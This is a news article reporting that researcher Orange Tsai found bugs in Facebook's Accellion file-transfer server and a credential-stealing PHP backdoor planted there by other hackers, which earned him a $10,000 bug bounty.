Facebook Server Had Backdoor Script Installed By Hackers

Updated on

Facebook’s corporate server was targeted by hackers looking to steal workers’ log-in credentials, and they succeeded at installing a backdoor script on it. There is no denying that Facebook is one of the biggest web companies in the world, and hacking through its system is a dream for hackers since it will open doors of unlimited possibilities.

Facebook Server Had Backdoor Script Installed By Hackers

How Facebook found the bug

A white-hat hacker named Orange Tsai helped Facebook detect the bug and deal with it. Tsai works as a security researcher for DEVCORE, a Taiwanese security vendor. He was looking for bugs in hopes of earning some cash and accidentally discovered the script. Tsai used some wise tactics to deal with it.

First of all, he looked into Facebook’s IP address, which directed him to the domain files.fb.com, and found that the said domain was moderating a susceptible account of Accellion’s Secure File Transfer application (FTA). This domain is used by Facebook employees for communication and file sharing.

“When I was doing some recon and research, not only did I look up the domain names of Facebook itself, but also tried Reverse Whois. And to my surprise, I found an INTERESTING domain name,” Tsai noted in a blog post.

On investigating further, Tsai found a total of seven bugs. He was able to access Facebook’s server by using those discoveries. Once in, he started looking into the existing log data on the server. When compiling them all into a report, Tsai detected a PHP-based backdoor, known as PHP Web Shell, that hackers probably set up on the server.

No harm done

Tsai then reported the issue to Facebook’s Security Team. Along with the vulnerability details accompanying the logs, he submitted screenshots and timelines. In return for his efforts, Tsai received $10,000 as a reward from the social networking giant.

In a blog post, last week, Tsai said, “At the time I discovered these, there were around 300 logged credentials dated between February 1st to 7th, mostly ‘@fb.com’ and ‘@facebook.com’. Upon seeing it I thought it’s a pretty serious security incident.”

Based on Tsai’s findings, Facebook discovered that malicious hackers penetrated its server and successfully installed a backdoor for the purpose of stealing log-in credentials and details of its employees. However, this action had no impact on Facebook users because the script was not installed on the primary server, the main door, but rather, into the corporate server.